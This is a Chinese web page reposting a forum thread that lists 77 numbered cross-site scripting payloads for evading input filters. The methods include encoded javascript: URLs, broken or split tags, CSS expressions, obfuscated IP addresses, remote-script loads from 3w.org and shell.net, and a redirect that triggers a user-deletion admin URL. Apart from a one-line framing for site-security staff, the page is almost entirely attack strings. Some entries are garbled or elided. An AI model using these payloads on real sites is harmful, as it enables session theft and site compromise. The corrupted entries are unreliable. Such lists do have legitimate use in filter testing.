欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  网络运营

XSS攻击汇总 做网站安全的朋友需要注意下

程序员文章站 2022-03-12 15:57:22
貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的... 12-10-16...
(1)普通的xss javascript注入
<script src=http://3w.org/xss/xss.js></script>
(2)img标签xss使用javascript命令
<script src=http://3w.org/xss/xss.js></script>
(3)img标签无分号无引号
<img src=javascript:alert(‘xss’)>
(4)img标签大小写不敏感
<img src=javascript:alert(‘xss’)>
(5)html编码(必须有分号)
<img src=javascript:alert(“xss”)>
(6)修正缺陷img标签
<img “”"><script>alert(“xss”)</script>”>
(7)formcharcode标签(计算器)
<img src=javascript:alert(string.fromcharcode(88,83,83))>
(8)utf-8的unicode编码(计算器)
<img src=jav..省略..s')>
(9)7位的utf-8的unicode编码是没有分号的(计算器)
<img src=jav..省略..s')>
(10)十六进制编码也是没有分号(计算器)
<img src=&#x6a&#x61&#x76&#x61..省略..&#x58&#x53&#x53&#x27&#x29>
(11)嵌入式标签,将javascript分开
<img src=”jav ascript:alert(‘xss’);”>
(12)嵌入式编码标签,将javascript分开
<img src=”jav ascript:alert(‘xss’);”>
(13)嵌入式换行符
<img src=”jav ascript:alert(‘xss’);”>
(14)嵌入式回车
<img src=”jav ascript:alert(‘xss’);”>
(15)嵌入式多行注入javascript,这是xss极端的例子
<img src=”javascript:alert(‘xss‘)”>
(16)解决限制字符(要求同页面)
<script>z=’document.’</script>
<script>z=z+’write(“‘</script>
<script>z=z+’<script’</script>
<script>z=z+’ src=ht’</script>
<script>z=z+’tp://ww’</script>
<script>z=z+’w.shell’</script>
<script>z=z+’.net/1.’</script>
<script>z=z+’js></sc’</script>
<script>z=z+’ript>”)’</script>
<script>eval_r(z)</script>
(17)空字符12-7-1 t00ls - powered by discuz! board
https://www.t00ls.net/viewthread.php?action=printable&tid=15267 2/6
perl -e ‘print “<img src=java\0script:alert(\”xss\”)>”;’ > out
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
perl -e ‘print “<scr\0ipt>alert(\”xss\”)</scr\0ipt>”;’ > out
(19)spaces和meta前的img标签
<img src=” javascript:alert(‘xss’);”>
(20)non-alpha-non-digit xss
<script/xss src=”http://3w.org/xss/xss.js”></script>
(21)non-alpha-non-digit xss to 2
<body onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“xss”)>
(22)non-alpha-non-digit xss to 3
<script/src=”http://3w.org/xss/xss.js”></script>
(23)双开括号
<<script>alert(“xss”);//<</script>
(24)无结束脚本标记(仅火狐等浏览器)
<script src=http://3w.org/xss/xss.js?<b>
(25)无结束脚本标记2
<script src=//3w.org/xss/xss.js>
(26)半开的html/javascript xss
<img src=”javascript:alert(‘xss’)”
(27)双开角括号
<iframe src=http://3w.org/xss.html <
(28)无单引号 双引号 分号
<script>a=/xss/
alert(a.source)</script>
(29)换码过滤的javascript
\”;alert(‘xss’);//
(30)结束title标签
</title><script>alert(“xss”);</script>
(31)input image
<input src=”javascript:alert(‘xss’);”>
(32)body image
<body background=”javascript:alert(‘xss’)”>
(33)body标签
<body(‘xss’)>
(34)img dynsrc
<img dynsrc=”javascript:alert(‘xss’)”>
(35)img lowsrc
<img lowsrc=”javascript:alert(‘xss’)”>
(36)bgsound
<bgsound src=”javascript:alert(‘xss’);”>
(37)style sheet
<link rel=”stylesheet” href=”javascript:alert(‘xss’);”>
(38)远程样式表
<link rel=”stylesheet” href=”http://3w.org/xss.css”>
(39)list-style-image(列表式)
<style>li {list-style-image: url(“javascript:alert(‘xss’)”);}</style><ul><li>xss
(40)img vbscript
<img src=’vbscript:msgbox(“xss”)’></style><ul><li>xss
(41)meta链接url
<meta http-equiv=”refresh” content=”0;
url=http://;url=javascript:alert(‘xss’);”>
(42)iframe
<iframe src=”javascript:alert(‘xss’);”></iframe>
(43)frame
<frameset><frame src=”javascript:alert(‘xss’);”></frameset>12-7-1 t00ls - powered by discuz! board
https://www.t00ls.net/viewthread.php?action=printable&tid=15267 3/6
(44)table
<table background=”javascript:alert(‘xss’)”>
(45)td
<table><td background=”javascript:alert(‘xss’)”>
(46)div background-image
<div style=”background-image: url(javascript:alert(‘xss’))”>
(47)div background-image后加上额外字符(1-32&34&39&160&8192-
8&13&12288&65279)
<div style=”background-image: url(javascript:alert(‘xss’))”>
(48)div expression
<div style=”width: expression_r(alert(‘xss’));”>
(49)style属性分拆表达
<img style=”xss:expression_r(alert(‘xss’))”>
(50)匿名style(组成:开角号和一个字母开头)
<xss style=”xss:expression_r(alert(‘xss’))”>
(51)style background-image
<style>.xss{background-image:url(“javascript:alert(‘xss’)”);}</style><a
class=xss></a>
(52)img style方式
exppression(alert(“xss”))’>
(53)style background
<style><style
type=”text/css”>body{background:url(“javascript:alert(‘xss’)”)}</style>
(54)base
<base href=”javascript:alert(‘xss’);//”>
(55)embed标签,你可以嵌入flash,其中包涵xss
<embed src=”http://3w.org/xss/xss.swf” ></embed>
(56)在flash中使用actionscrpt可以混进你xss的代码
a=”get”;
b=”url(\”";
c=”javascript:”;
d=”alert(‘xss’);\”)”;
eval_r(a+b+c+d);
(57)xml namespace.htc文件必须和你的xss载体在一台服务器上
<html xmlns:xss>
<?import namespace=”xss” implementation=”http://3w.org/xss/xss.htc”>
<xss:xss>xss</xss:xss>
</html>
(58)如果过滤了你的js你可以在图片里添加js代码来利用
<script src=””></script>
(59)img嵌入式命令,可执行任意命令
<img src=”http://www.xxx.com/a.php?a=b”>
(60)img嵌入式命令(a.jpg在同服务器)
redirect 302 /a.jpg http://www.xxx.com/admin.asp&deleteuser
(61)绕符号过滤
<script a=”>” src=”http://3w.org/xss.js”></script>
(62)
<script =”>” src=”http://3w.org/xss.js”></script>
(63)
<script a=”>” ” src=”http://3w.org/xss.js”></script>
(64)
<script “a=’>’” src=”http://3w.org/xss.js”></script>
(65)
<script a=`>` src=”http://3w.org/xss.js”></script>
(66)12-7-1 t00ls - powered by discuz! board
https://www.t00ls.net/viewthread.php?action=printable&tid=15267 4/6
<script a=”>’>” src=”http://3w.org/xss.js”></script>
(67)
<script>document.write(“<scri”);</script>pt src=”http://3w.org/xss.js”>
</script>
(68)url绕行
<a href=”http://127.0.0.1/”>xss</a>
(69)url编码
<a href=”http://3w.org”>xss</a>
(70)ip十进制
<a href=”http://3232235521′>xss</a>
(71)ip十六进制
<a href=”http://0xc0.0xa8.0×00.0×01′>xss</a>
(72)ip八进制
<a href=”http://0300.0250.0000.0001′>xss</a>
(73)混合编码
<a href=”h
tt p://6 6.000146.0×7.147/”">xss</a>
(74)节省[http:]
<a href=”//www.google.com/”>xss</a>
(75)节省[www]
<a href=”http://google.com/”>xss</a>
(76)绝对点绝对dns
<a href=”http://www.google.com./”>xss</a>
(77)javascript链接
<a href=”javascript:document.location=’http://www.google.com/’”>xss</a>
相关标签: XSS攻击